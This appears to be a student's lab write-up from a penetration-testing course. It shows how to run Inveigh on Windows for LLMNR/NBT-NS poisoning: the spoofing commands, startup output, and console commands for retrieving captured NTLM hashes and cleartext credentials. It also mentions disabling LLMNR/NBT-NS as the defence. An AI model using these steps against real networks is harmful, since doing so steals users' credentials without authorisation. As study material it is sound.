On 3a, I wrote about LLMNR/NBT-NS Poisoning from Linux using Responder.

Basically, attacker is spoofing as LLMNR/NBT-NS when DNS fails, and sends out fake response to collect password hashes.

This time, we will use Inveighto do the same on Windows.


  • written in Powershell and C#
  • Listen to protocols including, LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPs, SMB, LDAP, WebDAV, and Proxy Auth.


PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> (Get-Command Invoke-Inveigh).Parameters
Key                     Value
---                     -----
ADIDNSHostsIgnore       System.Management.Automation.ParameterMetadata
KerberosHostHeader      System.Management.Automation.ParameterMetadata
ProxyIgnore             System.Management.Automation.ParameterMetadata
PcapTCP                 System.Management.Automation.ParameterMetadata
PcapUDP                 System.Management.Automation.ParameterMetadata
SpooferHostsReply       System.Management.Automation.ParameterMetadata
SpooferHostsIgnore      System.Management.Automation.ParameterMetadata
SpooferIPsReply         System.Management.Automation.ParameterMetadata
SpooferIPsIgnore        System.Management.Automation.ParameterMetadata
WPADDirectHosts         System.Management.Automation.ParameterMetadata
WPADAuthIgnore          System.Management.Automation.ParameterMetadata
ConsoleQueueLimit       System.Management.Automation.ParameterMetadata
ConsoleStatus           System.Management.Automation.ParameterMetadata
ADIDNSThreshold         System.Management.Automation.ParameterMetadata
ADIDNSTTL               System.Management.Automation.ParameterMetadata
DNSTTL                  System.Management.Automation.ParameterMetadata
HTTPPort                System.Management.Automation.ParameterMetadata
HTTPSPort               System.Management.Automation.ParameterMetadata
KerberosCount           System.Management.Automation.ParameterMetadata
LLMNRTTL                System.Management.Automation.ParameterMetadata

For LLMNR and NBNS spoofing:

PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2022-02-28T19:26:30
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address =
[+] Spoofer IP Address =
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer For Types 00,20 = Enabled
[+] NBNS TTL = 165 Seconds
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Certificate Issuer = Inveigh
[+] HTTPS Certificate CN = localhost
[+] HTTPS Capture = Enabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\Tools
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output


Powershell version of inveigh is the original version but is no longer updated. However C# version is still maintained.

PS C:\htb> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276]
[+] Packet Sniffer Addresses [IP | IPv6 fe80::dcec:2831:712b:c9a3%8]
[+] Listener Addresses [IP | IPv6 ::]
[+] Spoofer Reply Addresses [IP | IPv6 fe80::dcec:2831:712b:c9a3%8]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]

We can hit ESC to enter interactive console.

HELP shows several options:

=============================================== Inveigh Console Commands ===============================================
Command                           Description
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOHOSTS                | get ReplyToHosts parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREHOSTS                 | get IgnoreHosts parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

GET NTLMV2UNIQUE: View captured hashes GET NTLMV2USERNAMES: View usernames


  • Disable LLMNR and NBT-NS

Moving on

Now through 3a,b LLMNR/NBT-NS poisoning, we have captured and cracked hashes for several accounts.

Now it’s time to use this hashes:

  • Bloodhound
  • Password Spraying